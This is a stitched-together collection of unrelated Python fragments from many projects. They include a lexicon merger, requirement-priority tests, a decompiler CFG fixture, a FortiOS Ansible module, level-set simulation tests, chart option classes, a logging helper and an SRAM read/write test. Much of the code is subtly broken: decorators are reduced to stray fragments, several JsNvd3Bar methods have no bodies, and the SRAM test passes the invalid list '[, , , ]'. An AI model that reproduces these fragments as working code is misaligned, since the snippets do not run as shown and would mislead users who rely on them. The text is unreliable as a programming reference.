if (lexdata[lexkey]['origin'] == 'unk'):
lexdata[lexkey]['origin'] = tsv_parts['origin']
elif (tsv_parts['origin'] in lexdata[lexkey]['origin']):
pass
else:
lexdata[lexkey]['origin'] += ('|' + tsv_parts['origin'])
else:
print('cannot merge (new, old):', tsv_parts, lexdata[lexkey], sep='\n')
missed += 1
else:
lexdata[lexkey] = tsv_parts
added += 1
print('Added', added, 'merged', merged, 'left', missed)
with open(args.outfilename, 'w') as output:
if args.verbose:
print('Writing master database to', args.outfilename)
print('Sorting')
linecount = 0
print('lemma', 'homonym', 'new_para', 'origin', sep='\t', file=output)
for (line, fields) in sorted(lexdata.items()):
linecount += 1
if (args.verbose and (((linecount % 10000) == 0) or (linecount == 1))):
print(linecount, '...', end='\r')
print(fields['lemma'], fields['homonym'], fields['new_para'], fields['origin'], sep='\t', file=output)
if args.verbose:
print()
exit() |
class RMTTestRDepPriority(object):
def rmttest_positive_01(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement', 'B', None, None, None)
reqset.add_requirement(req2)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.8)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.8 == reqset.get_named_node('B').get_value('Priority'))
def rmttest_positive_02(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement\nSolved by: C', 'B', None, None, None)
reqset.add_requirement(req2)
req3 = Requirement('Name: C\nType: requirement', 'C', None, None, None)
reqset.add_requirement(req3)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.8)
reqset.get_named_node('C').set_value('Factor', 0.5)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.8 == reqset.get_named_node('B').get_value('Priority'))
assert (0.4 == reqset.get_named_node('C').get_value('Priority'))
def rmttest_positive_03(self):
config = TestConfig()
reqset = RequirementSet(config)
req1 = Requirement('Name: A\nType: master requirement\nSolved by: B C', 'A', None, None, None)
reqset.add_requirement(req1)
req2 = Requirement('Name: B\nType: requirement\nSolved by: D', 'B', None, None, None)
reqset.add_requirement(req2)
req3 = Requirement('Name: C\nType: requirement\nSolved by: D', 'C', None, None, None)
reqset.add_requirement(req3)
req4 = Requirement('Name: D\nType: requirement', 'D', None, None, None)
reqset.add_requirement(req4)
reqset.resolve_solved_by()
reqset.find_master_nodes()
reqset.build_named_nodes()
reqset.graph_master_node = reqset.get_named_node('A')
reqset.get_named_node('A').set_value('Factor', 1.0)
reqset.get_named_node('B').set_value('Factor', 0.2)
reqset.get_named_node('C').set_value('Factor', 0.4)
reqset.get_named_node('D').set_value('Factor', 0.5)
rdep = RDepPriority(config)
rdep.rewrite(reqset)
assert (1.0 == reqset.get_named_node('A').get_value('Priority'))
assert (0.2 == reqset.get_named_node('B').get_value('Priority'))
assert (0.4 == reqset.get_named_node('C').get_value('Priority'))
assert (0.2 == reqset.get_named_node('D').get_value('Priority')) |
class VersionStatusType(sqlalchemy.types.TypeDecorator):
impl = sqlalchemy.Integer
cache_ok = True
def process_bind_param(self, value: Optional[Union[(int, str, VersionStatus)]], dialect) -> Optional[int]:
if (value is None):
return None
elif isinstance(value, int):
return value
elif isinstance(value, str):
return VersionStatus[value].value
elif isinstance(value, VersionStatus):
return value.value
else:
raise InternalError('Unexpected type {} for value in VersionStatusType.process_bind_param'.format(type(value)))
def process_result_value(self, value: Optional[int], dialect) -> Optional[VersionStatus]:
if (value is not None):
return VersionStatus(value)
else:
return None |
class PropertyPreprocessorNode(RegistryNode):
type = NodeTypes.PREPROCESSOR
def configured_preprocessor(self):
return self.config(self.item.get('properties', {}))
def process_arg(self, arg, node, raw_args):
return self.configured_preprocessor.process_arg(arg, node, raw_args)
def imports(self):
return self.configured_preprocessor.imports() |
def handle_hard_error():
global SESSION_ID, HARD_FAILS, HS_DELAY
if (HS_DELAY == 0):
HS_DELAY = 60
elif (HS_DELAY < (120 * 60)):
HS_DELAY *= 2
if (HS_DELAY > (120 * 60)):
HS_DELAY = (120 * 60)
HARD_FAILS += 1
if (HARD_FAILS == 3):
SESSION_ID = None |
class BaseFilter(object):
report_fields = ('name', 'passed_unchanged', 'passed_changed', 'failed', 'total_filtered', 'proportion_passed')
def __init__(self, listener=None):
self.passed_unchanged = 0
self.passed_changed = 0
self.failed = 0
self.listener = listener
def filter_record(self, record):
raise NotImplementedError('Override in subclass')
def filter_records(self, records):
for record in records:
try:
filtered = self.filter_record(record)
assert filtered
if (filtered.seq == record.seq):
self.passed_unchanged += 1
else:
self.passed_changed += 1
(yield filtered)
except FailedFilter as e:
self.failed += 1
v = e.value
if self.listener:
self.listener('failed_filter', record, filter_name=self.name, value=v)
def passed(self):
return (self.passed_changed + self.passed_unchanged)
def total_filtered(self):
return (self.passed + self.failed)
def proportion_passed(self):
if (not self.total_filtered):
return 0
return (float(self.passed) / self.total_filtered)
def report_dict(self):
return dict(((f, getattr(self, f)) for f in self.report_fields)) |
def graphs_test9():
cfg = ControlFlowGraph()
cfg.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), Call(imp_function_symbol('__x86.get_pc_thunk.bx'), [], Pointer(CustomType('void', 0), 32), 1)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 2)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [(base1 := Variable('arg1', Pointer(Integer(32, True), 32), 0, False)), Constant(8, Integer(32, True))], Pointer(CustomType('void', 0), 32))], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 3))]), BasicBlock(1, [Phi(Variable('var_10', Integer(32, True), 2, False), [Constant(0, Integer(32, True)), Variable('var_10', Integer(32, True), 3, False)]), Branch(Condition(OperationType.less, [Variable('var_10', Integer(32, True), 2, False), Variable('arg2', Integer(32, True), 0, False)], CustomType('bool', 1)))]), BasicBlock(2, [Assignment(ListOperation([Variable('eax_7', Integer(32, True), 10, False)]), Call(imp_function_symbol('rand'), [], Pointer(CustomType('void', 0), 32), 5)), Assignment(UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [BinaryOperation(OperationType.left_shift, [(index2 := Variable('var_10', Integer(32, True), 2, False)), Constant(2, Integer(8, True))], Integer(32, True)), (base2 := Variable('arg1', Pointer(Integer(32, True), 32), 0, False))], Pointer(CustomType('void', 0), 32))], Integer(32, True), 6, False), Variable('eax_7', Integer(32, True), 10, False)), Assignment(Variable('var_10', Integer(32, True), 3, False), BinaryOperation(OperationType.plus, [Variable('var_10', Integer(32, True), 2, False), Constant(1, Integer(32, True))], Integer(32, True)))]), BasicBlock(3, [Return(ListOperation([Variable('var_10', Integer(32, True), 2, False)]))])]))
cfg.add_edges_from([UnconditionalEdge(vertices[0], vertices[1]), TrueCase(vertices[1], vertices[2]), FalseCase(vertices[1], vertices[3]), UnconditionalEdge(vertices[2], vertices[1])])
out_cfg = ControlFlowGraph()
out_cfg.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), Call(imp_function_symbol('__x86.get_pc_thunk.bx'), [], Pointer(CustomType('void', 0), 32), 1)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Integer(32, True), None, False)], Pointer(CustomType('void', 0), 32), 2)), Assignment(ListOperation([]), Call(imp_function_symbol('printf'), [Constant(5328, Pointer(CustomType('void', 0), 32)), UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [(base := Variable('arg1', Pointer(Integer(32, True), 32), 0, False)), Constant(8, Integer(32, True))], Pointer(CustomType('void', 0), 32))], Integer(32, True), None, False, array_info=ArrayInfo(base1, 2, True))], Pointer(CustomType('void', 0), 32), 3))]), BasicBlock(1, [Phi(Variable('var_10', Integer(32, True), 2, False), [Constant(0, Integer(32, True)), Variable('var_10', Integer(32, True), 3, False)]), Branch(Condition(OperationType.less, [Variable('var_10', Integer(32, True), 2, False), Variable('arg2', Integer(32, True), 0, False)], CustomType('bool', 1)))]), BasicBlock(2, [Assignment(ListOperation([Variable('eax_7', Integer(32, True), 10, False)]), Call(imp_function_symbol('rand'), [], Pointer(CustomType('void', 0), 32), 5)), Assignment(UnaryOperation(OperationType.dereference, [BinaryOperation(OperationType.plus, [BinaryOperation(OperationType.left_shift, [Variable('var_10', Integer(32, True), 2, False), Constant(2, Integer(8, True))], Integer(32, True)), Variable('arg1', Pointer(Integer(32, True), 32), 0, False)], Pointer(CustomType('void', 0), 32))], Integer(32, True), 6, False, array_info=ArrayInfo(base2, index2, True)), Variable('eax_7', Integer(32, True), 10, False)), Assignment(Variable('var_10', Integer(32, True), 3, False), BinaryOperation(OperationType.plus, [Variable('var_10', Integer(32, True), 2, False), Constant(1, Integer(32, True))], Integer(32, True)))]), BasicBlock(3, [Return(ListOperation([Variable('var_10', Integer(32, True), 2, False)]))])]))
out_cfg.add_edges_from([UnconditionalEdge(vertices[0], vertices[1]), TrueCase(vertices[1], vertices[2]), FalseCase(vertices[1], vertices[3]), UnconditionalEdge(vertices[2], vertices[1])])
return (cfg, out_cfg) |
def remove_empty_containers(row: RecursiveRow) -> RecursiveRow:
if isinstance(row, dict):
for (key, value) in row.copy().items():
if isinstance(value, (dict, list)):
value = remove_empty_containers(value)
if (value in [{}, []]):
del row[key]
elif isinstance(row, list):
for (index, elem) in reversed(list(enumerate(row))):
if isinstance(elem, (dict, list)):
elem = remove_empty_containers(elem)
if (elem in [{}, []]):
row.pop(index)
return row |
def main():
module_spec = schema_to_module_spec(versioned_schema)
mkeyname = 'name'
fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']}, 'firewall_vip6': {'required': False, 'type': 'dict', 'default': None, 'options': {}}}
for attribute_name in module_spec['options']:
fields['firewall_vip6']['options'][attribute_name] = module_spec['options'][attribute_name]
if (mkeyname and (mkeyname == attribute_name)):
fields['firewall_vip6']['options'][attribute_name]['required'] = True
module = AnsibleModule(argument_spec=fields, supports_check_mode=True)
check_legacy_fortiosapi(module)
is_error = False
has_changed = False
result = None
diff = None
versions_check_result = None
if module._socket_path:
connection = Connection(module._socket_path)
if ('access_token' in module.params):
connection.set_option('access_token', module.params['access_token'])
if ('enable_log' in module.params):
connection.set_option('enable_log', module.params['enable_log'])
else:
connection.set_option('enable_log', False)
fos = FortiOSHandler(connection, module, mkeyname)
versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_vip6')
(is_error, has_changed, result, diff) = fortios_firewall(module.params, fos, module.check_mode)
else:
module.fail_json(**FAIL_SOCKET_MSG)
if (versions_check_result and (versions_check_result['matched'] is False)):
module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv')
if (not is_error):
if (versions_check_result and (versions_check_result['matched'] is False)):
module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff)
else:
module.exit_json(changed=has_changed, meta=result, diff=diff)
elif (versions_check_result and (versions_check_result['matched'] is False)):
module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result)
else:
module.fail_json(msg='Error in repo', meta=result) |
('wiring_config', [containers.WiringConfiguration(modules=['.module'], packages=['.package'])])
def test_relative_names_with_auto_package():
service = module.test_function()
assert isinstance(service, Service)
from samples.wiring.package.subpackage.submodule import test_function
service = test_function()
assert isinstance(service, Service) |
('Updater._write_updates_status_flag_to_disk')
def test_should_run_updater_invalid_timestamp(mocked_write):
TEST_INTERVAL = 3600
with mock.patch('Updater.last_required_reboot_performed') as mocked_last:
mocked_last.return_value = True
with mock.patch('Updater.read_dom0_update_flag_from_disk') as mocked_read:
mocked_read.return_value = {'last_status_update': 'time to die', 'status': UpdateStatus.UPDATES_OK.value}
assert (updater.should_launch_updater(TEST_INTERVAL) is True) |
class TestNCLS(object):
def setup_class(cls):
pass
def teardown_class(cls):
pass
def setup_method(self, method):
reload(ncls)
self.pList = [ncls_p]
self.nList = [ncls_n]
self.sList = [default_s]
self.so = default_so
self.so.tnList = self.nList[0].tnList
self._scriptdir = os.path.dirname(__file__)
self.sim_names = []
self.aux_names = []
def teardown_method(self, method):
pass
def test_pure_advection_supg(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 0
ncls.ct.COUPEZ = False
ncls.ct.DO_REDISTANCING = False
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_pureAdvection_SUPG')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_pureAdvection_SUPG.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_pureAdvection_SUPG_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_pure_advection_ev1(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = False
ncls.ct.ENTROPY_TYPE = 1
ncls.ct.COUPEZ = False
ncls.ct.DO_REDISTANCING = False
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_pureAdvection_EV1')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_pureAdvection_EV1.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_pureAdvection_EV1_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_coupez_with_redistancing_non_saturated(self):
ncls.ct.level_set_function = 0
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = False
ncls.ct.ENTROPY_TYPE = 1
ncls.ct.COUPEZ = True
ncls.ct.DO_REDISTANCING = True
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_non_saturated_ls')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_non_saturated_ls.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_non_saturated_ls_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close()
def test_coupez_with_redistancing_saturated(self):
ncls.ct.level_set_function = 1
ncls.ct.STABILIZATION_TYPE = 1
ncls.ct.SATURATED_LEVEL_SET = True
ncls.ct.ENTROPY_TYPE = 2
ncls.ct.COUPEZ = True
ncls.ct.DO_REDISTANCING = True
reload(default_n)
reload(ncls_n)
reload(ncls_p)
self.so.name = (self.pList[0].name + '_saturated_ls')
ns = proteus.NumericalSolution.NS_base(self.so, self.pList, self.nList, self.sList, opts)
self.sim_names.append(ns.modelList[0].name)
ns.calculateSolution('ncls')
actual = tables.open_file('ncls_level_0_saturated_ls.h5', 'r')
expected_path = ((('comparison_files/' + 'comparison_') + 'ncls_level_0_saturated_ls_') + '_u_t2.csv')
np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path), sep=','), np.array(actual.root.u_t2).flatten(), decimal=10)
actual.close() |
class SimpleVizGroup(lg.Group):
INPUT = lg.Topic(RandomMessage)
PLOT: ScatterPlot
WINDOW: Window
def setup(self) -> None:
self.PLOT.configure(ScatterPlotConfig(x_field='x', y_field='y', labels={'bottom': 'Bottom Label', 'left': 'Left Label'}, styles={'red': ScatterPlotStyle(symbol='x', symbolSize=10, symbolBrush='r', name='red'), 'green': ScatterPlotStyle(symbol='x', symbolSize=10, symbolBrush='g', name='green')}))
self.WINDOW.PLOT = self.PLOT
def connections(self) -> lg.Connections:
return ((self.INPUT, self.PLOT.INPUT),) |
class JsNvd3Bar(JsNvd3):
chartFnc = 'discreteBarChart'
def x(self, column=None, js_funcs=None, profile=False):
if (column is not None):
self.fnc(('x(function(d){return d.%s})' % column))
elif (js_funcs is not None):
self.fnc(('x(%s)' % JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)))
return self
def y(self, column=None, js_funcs=None, profile=False):
if (column is not None):
self.fnc(('y(function(d){return d.%s})' % column))
elif (js_funcs is not None):
self.fnc(('y(%s)' % JsUtils.jsConvertFncs(js_funcs, toStr=True, profile=profile)))
return self
def color(self, colors: list):
self.fnc(('color(%s)' % JsUtils.jsConvertData(colors, None)))
return self
def rotateLabels(self, value):
self.fnc(('rotateLabels(%s)' % value))
return self
def reduceXTicks(self, flag: bool):
def staggerLabels(self, flag: bool):
def tooltips(self, flag: bool):
def showValues(self, flag: bool):
self.fnc(('showValues(%s)' % JsUtils.jsConvertData(flag, None)))
return self
def groupSpacing(self, value):
raise NotImplementedError() |
def test_normalize_smallest_cool(capsys):
outfile_one = NamedTemporaryFile(suffix='.cool', delete=False)
outfile_one.close()
outfile_two = NamedTemporaryFile(suffix='.cool', delete=False)
outfile_two.close()
args = '--matrices {} {} --normalize smallest -o {} {}'.format(matrix_one_cool, matrix_two_cool, outfile_one.name, outfile_two.name).split()
compute(hicNormalize.main, args, 5)
test_one = hm.hiCMatrix((ROOT + '/smallest_one.cool'))
test_two = hm.hiCMatrix((ROOT + '/smallest_two.cool'))
new_one = hm.hiCMatrix(outfile_one.name)
new_two = hm.hiCMatrix(outfile_two.name)
nt.assert_equal(test_one.matrix.data, new_one.matrix.data)
nt.assert_equal(test_one.cut_intervals, new_one.cut_intervals)
nt.assert_equal(test_two.matrix.data, new_two.matrix.data)
nt.assert_equal(test_two.cut_intervals, new_two.cut_intervals)
os.unlink(outfile_one.name)
os.unlink(outfile_two.name) |
def get_labeled_model_data_list_for_layout_document(layout_document: LayoutDocument, model: Model, document_features_context: DocumentFeaturesContext) -> Sequence[LabeledLayoutModelData]:
data_generator = model.get_data_generator(document_features_context=document_features_context)
model_data_list: Sequence[LayoutModelData] = list(data_generator.iter_model_data_for_layout_document(layout_document))
return get_labeled_model_data_list(model_data_list, model=model) |
class OptionPlotoptionsBarOnpoint(Options):
def connectorOptions(self) -> 'OptionPlotoptionsBarOnpointConnectoroptions':
return self._config_sub_data('connectorOptions', OptionPlotoptionsBarOnpointConnectoroptions)
def id(self):
return self._config_get(None)
def id(self, text: str):
self._config(text, js_type=False)
def position(self) -> 'OptionPlotoptionsBarOnpointPosition':
return self._config_sub_data('position', OptionPlotoptionsBarOnpointPosition) |
def includeme(config):
settings = config.registry.settings
session_provider_callable_config = settings.get(('%s.session_provider_callable' % CONFIG_KEY))
try_global_session = False
if (not session_provider_callable_config):
def session_provider_callable(request):
return get_db_session()
try_global_session = True
elif callable(session_provider_callable_config):
session_provider_callable = session_provider_callable_config
else:
parts = session_provider_callable_config.split(':')
_tmp = importlib.import_module(parts[0])
session_provider_callable = getattr(_tmp, parts[1])
def get_user(request):
userid = request.unauthenticated_userid
if try_global_session:
db_session = None
else:
db_session = session_provider_callable(request)
if (userid is not None):
return UserService.by_id(userid, db_session=db_session)
config.add_request_method(get_user, 'user', reify=True, property=True) |
class FLCoreLogger():
_instance = None
def __new__(cls):
if (cls._instance is None):
cls._instance = super().__new__(cls)
process_name = get_process_name()
fmt = '{}[%(process)d] %(levelname)s: %(module)s: %(name)s: %(message)s'.format(process_name)
cls.formatter = logging.Formatter(fmt=fmt)
return cls._instance
def get_syslog_handler(self):
syslog_handler = SysLogHandler(address='/dev/log')
syslog_handler.setFormatter(self.formatter)
syslog_handler.name = 'syslogHandler'
return syslog_handler
def get_console_handler(self):
console_handler = logging.StreamHandler()
console_handler.setFormatter(self.formatter)
console_handler.name = 'consoleHandler'
return console_handler
def add_handlers(self, logger, handler_list: list):
existing_handler_names = []
for existing_handler in logger.handlers:
existing_handler_names.append(existing_handler.name)
for new_handler in handler_list:
if (new_handler.name not in existing_handler_names):
logger.addHandler(new_handler)
def get_logger(self, logger_name: str):
_logger = logging.getLogger(logger_name)
console_handler = self.get_console_handler()
syslog_handler = self.get_syslog_handler()
self.add_handlers(_logger, [syslog_handler, console_handler])
_logger.propagate = False
error_override(_logger)
return _logger
def set_level(self, level_name: str):
if (level_name == 'debug'):
log_level = logging.DEBUG
elif (level_name == 'info'):
log_level = logging.INFO
elif (level_name == 'error'):
log_level = logging.ERROR
elif (level_name == 'critical'):
log_level = logging.CRITICAL
else:
log_level = logging.WARNING
logging.root.setLevel(log_level) |
class _PyperfComparison():
kind: Optional[str] = None
def from_raw(cls, raw: Any, *, fail: Optional[bool]=None) -> Optional['_PyperfComparison']:
if (not raw):
if fail:
raise ValueError(f'missing {cls.kind}')
return None
elif isinstance(raw, cls):
return raw
else:
if (fail or (fail is None)):
raise TypeError(raw)
return None
def _parse_value(cls, valuestr: str) -> Any:
return _utils.ElapsedTimeWithUnits.parse(valuestr, fail=True)
def __init__(self, source: Any, byname: Optional[Dict[(str, str)]]=None):
_utils.check_str(source, 'source', required=True, fail=True)
if (not os.path.isabs(source)):
raise ValueError(f'expected an absolute source, got {source!r}')
_byname: Dict[(str, Any)] = {}
if byname:
for (name, value) in byname.items():
assert (name and isinstance(name, str)), (name, value, byname)
assert (value and isinstance(value, str)), (name, value, byname)
_byname[name] = self._parse_value(value)
self._source = source
self._byname = _byname
def __repr__(self):
return f'{type(self).__name__}({self._source!r}, {self._byname!r})'
def __str__(self):
return f'<{self.kind} {self._source!r}>'
def __hash__(self):
try:
return self._hash
except AttributeError:
self._hash = hash(self._as_hashable())
return self._hash
def __eq__(self, other):
if (not isinstance(other, _PyperfComparison)):
return NotImplemented
if (self._source != other._source):
return False
if (self._byname != other._byname):
return False
return True
def _as_hashable(self) -> Tuple[(Any, Tuple)]:
return (self._source, (tuple(sorted(self._byname.items())) if self._byname else ()))
def source(self) -> str:
return self._source
def byname(self) -> Dict[(str, Any)]:
return dict(self._byname) |
_required
_required
def tasklog(request, hostname):
context = collect_view_data(request, 'node_list')
context['node'] = node = get_node(request, hostname)
context['nodes'] = (node,)
context['submenu_auto'] = ''
nss = node.nodestorage_set.all().extra(select={'strid': 'CAST(id AS text)'}).values_list('strid', flat=True)
log_query = ((Q(content_type=node.get_content_type()) & Q(object_pk=node.pk)) | (Q(content_type=NodeStorage.get_content_type()) & Q(object_pk__in=nss)))
log = get_tasklog(request, context=context, base_query=log_query, filter_by_permissions=False)
context['tasklog'] = context['pager'] = tasklog_items = get_pager(request, log, per_page=100)
TaskLogEntry.prepare_queryset(tasklog_items)
return render(request, 'gui/node/tasklog.html', context) |
def sram_test(comm, port):
wb = comms[comm](port=port, csr_csv='csr.csv')
wb.open()
def mem_dump(base, length):
for addr in range(base, (base + length), 4):
if ((addr % 16) == 0):
if (addr != base):
print('')
print('0x{:08x}'.format(addr), end=' ')
data = wb.read(addr)
for i in reversed(range(4)):
print('{:02x}'.format(((data >> (8 * i)) & 255)), end=' ')
print('')
def mem_write(base, datas):
for (n, addr) in enumerate(range(base, (base + (4 * len(datas))), 4)):
if ((addr % 16) == 0):
if (addr != base):
print('')
print('0x{:08x}'.format(addr), end=' ')
data = datas[n]
for i in reversed(range(4)):
print('{:02x}'.format(((data >> (8 * i)) & 255)), end=' ')
wb.write(addr, data)
print('')
print('Fill SRAM with counter:')
mem_write(wb.mems.sram.base, [i for i in range((128 // 4))])
print('')
print('Dump SRAM:')
mem_dump(wb.mems.sram.base, 128)
print('')
print('Fill SRAM with 4 32-bit words:')
mem_write(wb.mems.sram.base, [, , , ])
print('')
print('Dump SRAM:')
mem_dump(wb.mems.sram.base, 128)
print('')
wb.close() |
def nvmlUnitGetDevices(unit):
c_count = c_uint(nvmlUnitGetDeviceCount(unit))
device_array = (c_nvmlDevice_t * c_count.value)
c_devices = device_array()
fn = _nvmlGetFunctionPointer('nvmlUnitGetDevices')
ret = fn(unit, byref(c_count), c_devices)
_nvmlCheckReturn(ret)
return bytes_to_str(c_devices) |
def sample_noise(size: tuple[(int, ...)], offset_noise: float=0.1, device: (Device | str)='cpu', dtype: (DType | None)=None, generator: (Generator | None)=None) -> Tensor:
device = Device(device)
noise = randn(*size, generator=generator, device=device, dtype=dtype)
return (noise + (offset_noise * randn(*size[:2], 1, 1, generator=generator, device=device, dtype=dtype))) |
class TestDecisionId(TestCase):
def setUp(self) -> None:
pass
def test_str(self):
decision_id = DecisionId(DecisionTarget.ACTIVITY, 123)
s = str(decision_id)
self.assertIn(str(DecisionTarget.ACTIVITY), s)
self.assertIn('123', s)
def test_hash(self):
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.ACTIVITY, 123)
d3 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
self.assertEqual(hash(d1), hash(d2))
self.assertNotEqual(hash(d1), hash(d3))
def test_equal(self):
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.ACTIVITY, 123)
d3 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
self.assertTrue((d1 == d2))
self.assertFalse((d1 == d3))
def test_dictionary_key(self):
e = {}
d1 = DecisionId(DecisionTarget.ACTIVITY, 123)
d2 = DecisionId(DecisionTarget.CHILD_WORKFLOW, 456)
e[d1] = 'abc'
e[d2] = 'def'
self.assertEqual(e[d1], 'abc')
self.assertEqual(e[d2], 'def') |
class MachineRequirements():
machine_type: str
keep_alive: int = FAL_SERVERLESS_DEFAULT_KEEP_ALIVE
base_image: (str | None) = None
exposed_port: (int | None) = None
scheduler: (str | None) = None
scheduler_options: (dict[(str, Any)] | None) = None
max_concurrency: (int | None) = None
max_multiplexing: (int | None) = None |
class OptionSeriesScatter3dLabel(Options):
def boxesToAvoid(self):
return self._config_get(None)
def boxesToAvoid(self, value: Any):
self._config(value, js_type=False)
def connectorAllowed(self):
return self._config_get(False)
def connectorAllowed(self, flag: bool):
self._config(flag, js_type=False)
def connectorNeighbourDistance(self):
return self._config_get(24)
def connectorNeighbourDistance(self, num: float):
self._config(num, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get('undefined')
def formatter(self, value: Any):
self._config(value, js_type=False)
def maxFontSize(self):
return self._config_get(None)
def maxFontSize(self, num: float):
self._config(num, js_type=False)
def minFontSize(self):
return self._config_get(None)
def minFontSize(self, num: float):
self._config(num, js_type=False)
def onArea(self):
return self._config_get(None)
def onArea(self, flag: bool):
self._config(flag, js_type=False)
def style(self) -> 'OptionSeriesScatter3dLabelStyle':
return self._config_sub_data('style', OptionSeriesScatter3dLabelStyle)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False) |
class LESPeerRequestHandler(BasePeerRequestHandler):
async def handle_get_block_headers(self, peer: LESProxyPeer, cmd: commands.GetBlockHeaders) -> None:
self.logger.debug('Peer %s made header request: %s', peer, cmd)
headers = (await self.lookup_headers(cmd.payload.query))
self.logger.debug2('Replying to %s with %d headers', peer, len(headers))
peer.les_api.send_block_headers(headers, request_id=cmd.payload.request_id) |
def test_rollouts_from_python():
(env, agent) = (GymMazeEnv('CartPole-v0'), DummyCartPolePolicy())
sequential = SequentialRolloutRunner(n_episodes=2, max_episode_steps=2, deterministic=False, record_trajectory=False, record_event_logs=False, render=False)
sequential.maze_seeding = MazeSeeding(env_seed=1234, agent_seed=4321, cudnn_determinism_flag=False, explicit_env_seeds=None, explicit_agent_seeds=None, shuffle_seeds=False)
sequential.run_with(env=env, wrappers={}, agent=agent)
parallel = ParallelRolloutRunner(n_episodes=2, max_episode_steps=2, deterministic=False, record_trajectory=False, record_event_logs=False, n_processes=2)
parallel.maze_seeding = MazeSeeding(env_seed=1234, agent_seed=4321, cudnn_determinism_flag=False, explicit_env_seeds=None, explicit_agent_seeds=None, shuffle_seeds=False)
parallel.run_with(env=env, wrappers={MazeEnvMonitoringWrapper: {'observation_logging': True, 'action_logging': False, 'reward_logging': False}}, agent=agent) |
class ContextInjector(logging.Filter):
def filter(self, record):
current_process = ContextInjector.get_current_process()
current_hostname = socket.gethostname()
record.host = current_hostname
record.proc = current_process
record.pid = '-'
